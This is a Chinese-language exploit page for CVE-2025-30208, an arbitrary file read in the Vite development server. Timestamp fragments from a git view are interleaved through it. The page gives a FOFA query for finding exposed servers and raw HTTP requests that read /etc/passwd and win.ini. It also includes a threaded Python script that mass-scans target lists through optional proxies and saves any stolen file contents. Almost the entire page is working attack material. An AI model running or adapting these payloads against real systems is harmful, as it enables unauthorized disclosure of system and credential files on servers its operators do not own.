2025-03-31 14:47:56 +08:00
|
|
|
|
## Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
|
2025-03-31 14:26:48 +08:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
```
|
|
|
|
|
body="/@vite/client"
|
|
|
|
|
```
|
|
|
|
|
|
2025-04-07 11:06:59 +08:00
|
|
|
|
## POC-(Linux)
|
2025-03-31 14:26:48 +08:00
|
|
|
|
```
|
|
|
|
|
GET /@fs/etc/passwd?import&raw?? HTTP/1.1
|
|
|
|
|
Host: 127.0.0.1
|
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
|
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
|
|
|
Accept-Encoding: gzip, deflate, br
|
|
|
|
|
Connection: keep-alive
|
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
|
Priority: u=0, i
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
Content-Length: 94
|
|
|
|
|
|
2025-04-07 11:06:59 +08:00
|
|
|
|
```
|
|
|
|
|
## poc-(windows)
|
|
|
|
|
```
|
|
|
|
|
GET /@fs/C://Windows/win.ini?import&raw?? HTTP/1.1
|
|
|
|
|
Host: 127.0.0.1
|
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
|
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
|
|
|
Accept-Encoding: gzip, deflate, br
|
|
|
|
|
Connection: keep-alive
|
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
|
Priority: u=0, i
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
Content-Length: 94
|
2025-03-31 14:26:48 +08:00
|
|
|
|
```
|
2025-03-31 14:51:16 +08:00
|
|
|
|
## python脚本
|
2025-03-31 14:22:49 +08:00
|
|
|
|
|
2025-03-31 14:51:16 +08:00
|
|
|
|
```
|
|
|
|
|
import requests
|
|
|
|
|
import argparse
|
|
|
|
|
import urllib3
|
|
|
|
|
import concurrent.futures
|
|
|
|
|
import re
|
|
|
|
|
import time
|
|
|
|
|
from urllib.parse import urljoin
|
|
|
|
|
from colorama import Fore, Style, init
|
|
|
|
|
|
|
|
|
|
# 初始化 colorama(使其在 Windows 中也能支持颜色)
|
|
|
|
|
init(autoreset=True)
|
|
|
|
|
|
|
|
|
|
# Suppress SSL warnings
|
|
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
|
|
|
|
|
# 最大重试次数
|
|
|
|
|
RETRY_LIMIT = 3
|
|
|
|
|
|
|
|
|
|
def sanitize_filename(url):
|
|
|
|
|
""" 清理 URL 作为文件名,防止非法字符 """
|
|
|
|
|
safe_name = re.sub(r'[^\w\-]', '_', url) # 替换非法字符
|
|
|
|
|
safe_name = re.sub(r'_+', '_', safe_name) # 去重 `_`
|
|
|
|
|
safe_name = safe_name.strip('_') # 移除开头/结尾的 `_`
|
|
|
|
|
return safe_name
|
|
|
|
|
|
|
|
|
|
def fetch_url(url, proxy, retries=0):
|
|
|
|
|
""" 访问 URL,支持重试 """
|
|
|
|
|
proxies = {"http": proxy, "https": proxy} if proxy else None
|
|
|
|
|
try:
|
|
|
|
|
response = requests.get(url, timeout=5, verify=False, proxies=proxies, allow_redirects=False)
|
|
|
|
|
if response.status_code == 200:
|
|
|
|
|
return response.text
|
|
|
|
|
else:
|
|
|
|
|
print(f"[FAIL] {url} returned {response.status_code}")
|
|
|
|
|
return None
|
|
|
|
|
except requests.exceptions.ConnectionError:
|
|
|
|
|
if retries < RETRY_LIMIT:
|
|
|
|
|
wait_time = 2 ** retries # 指数退避
|
|
|
|
|
print(f"[ERROR] connect error to {url} - Retrying...")
|
|
|
|
|
time.sleep(wait_time)
|
|
|
|
|
return fetch_url(url, proxy, retries + 1)
|
|
|
|
|
else:
|
|
|
|
|
print(f"[ERROR] connect error to {url} after {RETRY_LIMIT} retries")
|
|
|
|
|
return None
|
|
|
|
|
except requests.exceptions.RequestException:
|
|
|
|
|
if retries < RETRY_LIMIT:
|
|
|
|
|
wait_time = 2 ** retries # 指数退避
|
|
|
|
|
print(f"[ERROR] connect error to {url} - Retrying...")
|
|
|
|
|
time.sleep(wait_time)
|
|
|
|
|
return fetch_url(url, proxy, retries + 1)
|
|
|
|
|
else:
|
|
|
|
|
print(f"[ERROR] connect error to {url} after {RETRY_LIMIT} retries")
|
|
|
|
|
return None
|
|
|
|
|
|
|
|
|
|
def check_url(base_url, paths, proxy, output_file):
|
|
|
|
|
""" 遍历多个路径,拼接 URL 并检查是否能访问 """
|
|
|
|
|
results = []
|
|
|
|
|
with concurrent.futures.ThreadPoolExecutor() as executor:
|
|
|
|
|
futures = {}
|
|
|
|
|
for path in paths:
|
|
|
|
|
url = urljoin(base_url, path)
|
|
|
|
|
if "?raw" not in url:
|
|
|
|
|
url += "?raw"
|
|
|
|
|
|
|
|
|
|
futures[executor.submit(fetch_url, url, proxy)] = url # 为每个路径提交并发请求
|
|
|
|
|
|
|
|
|
|
for future in concurrent.futures.as_completed(futures):
|
|
|
|
|
url = futures[future]
|
|
|
|
|
content = future.result()
|
|
|
|
|
if content:
|
|
|
|
|
if "/etc/passwd" in url: # 如果是 /etc/passwd 路径,仅显示 SUCCESS
|
|
|
|
|
print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}")
|
|
|
|
|
elif "/root:/bin/bash" in content: # 如果包含 /root:/bin/bash,成功并保存到文件
|
|
|
|
|
result = f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}"
|
|
|
|
|
print(result)
|
|
|
|
|
# 输出到 output.txt 文件(追加模式)
|
|
|
|
|
output_file.write(result + "\n")
|
|
|
|
|
output_file.write(content + "\n")
|
|
|
|
|
results.append(result)
|
|
|
|
|
else:
|
|
|
|
|
print(f"[FAIL] {url} does not contain expected content")
|
|
|
|
|
return results
|
|
|
|
|
|
|
|
|
|
def check_urls_from_file(file_path, paths, proxy):
|
|
|
|
|
""" 读取 URL 文件,并使用线程池并发检查 """
|
|
|
|
|
with open(file_path, 'r') as file:
|
|
|
|
|
links = [line.strip() for line in file.readlines()]
|
|
|
|
|
|
|
|
|
|
print(f"[INFO] Processing {len(links)} base URLs with concurrent requests.")
|
|
|
|
|
|
|
|
|
|
# 打开 output.txt 文件(以追加模式)
|
|
|
|
|
with open("output.txt", "a") as output_file:
|
|
|
|
|
results = []
|
|
|
|
|
with concurrent.futures.ThreadPoolExecutor() as executor:
|
|
|
|
|
futures = {executor.submit(check_url, link, paths, proxy, output_file): link for link in links}
|
|
|
|
|
for future in concurrent.futures.as_completed(futures):
|
|
|
|
|
result = future.result()
|
|
|
|
|
if result:
|
|
|
|
|
results.extend(result)
|
|
|
|
|
|
|
|
|
|
def check_urls_from_dict(paths, proxy):
|
|
|
|
|
""" 仅使用 -d 参数时,直接检查路径字典 """
|
|
|
|
|
print(f"[INFO] Processing {len(paths)} paths concurrently.")
|
|
|
|
|
|
|
|
|
|
results = []
|
|
|
|
|
with open("output.txt", "a") as output_file: # 以追加模式打开 output.txt
|
|
|
|
|
with concurrent.futures.ThreadPoolExecutor() as executor:
|
|
|
|
|
futures = {}
|
|
|
|
|
for path in paths:
|
|
|
|
|
futures[executor.submit(fetch_url, path, proxy)] = path
|
|
|
|
|
|
|
|
|
|
for future in concurrent.futures.as_completed(futures):
|
|
|
|
|
path = futures[future]
|
|
|
|
|
content = future.result()
|
|
|
|
|
if content:
|
|
|
|
|
if "/etc/passwd" in path: # 如果是 /etc/passwd 路径,仅显示 SUCCESS
|
|
|
|
|
print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}")
|
|
|
|
|
elif "/root:/bin/bash" in content: # 如果包含 /root:/bin/bash,成功并保存到文件
|
|
|
|
|
result = f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}"
|
|
|
|
|
print(result)
|
|
|
|
|
# 输出到 output.txt 文件(追加模式)
|
|
|
|
|
output_file.write(result + "\n")
|
|
|
|
|
output_file.write(content + "\n")
|
|
|
|
|
results.append(result)
|
|
|
|
|
else:
|
|
|
|
|
print(f"[FAIL] {path} does not contain expected content")
|
|
|
|
|
return results
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
|
parser = argparse.ArgumentParser(description="Batch check access to multiple paths on multiple links")
|
|
|
|
|
parser.add_argument("-f", "--file", help="File containing base links")
|
|
|
|
|
parser.add_argument("-u", "--url", help="Target URL")
|
|
|
|
|
parser.add_argument("-p", "--payload", default='/etc/passwd', help="Target file path")
|
|
|
|
|
parser.add_argument("-d", "--dict", help="File containing list of paths to append to base URL")
|
|
|
|
|
parser.add_argument("--proxy", help="Proxy server (e.g., http://proxy:port)")
|
|
|
|
|
args = parser.parse_args()
|
|
|
|
|
|
|
|
|
|
paths = []
|
|
|
|
|
if args.dict:
|
|
|
|
|
with open(args.dict, 'r') as dict_file:
|
|
|
|
|
paths = [line.strip() for line in dict_file.readlines()]
|
|
|
|
|
else:
|
|
|
|
|
paths.append(args.payload)
|
|
|
|
|
|
|
|
|
|
# 处理单个 URL
|
|
|
|
|
if args.url:
|
|
|
|
|
check_url(args.url, paths, args.proxy, None)
|
|
|
|
|
# 处理多个 URL
|
|
|
|
|
elif args.file:
|
|
|
|
|
check_urls_from_file(args.file, paths, args.proxy)
|
|
|
|
|
# 处理 -d 参数,单独加速路径检查
|
|
|
|
|
elif args.dict:
|
|
|
|
|
check_urls_from_dict(paths, args.proxy)
|
|
|
|
|
else:
|
|
|
|
|
print("Usage: python3 script.py -h")
|
|
|
|
|
```
|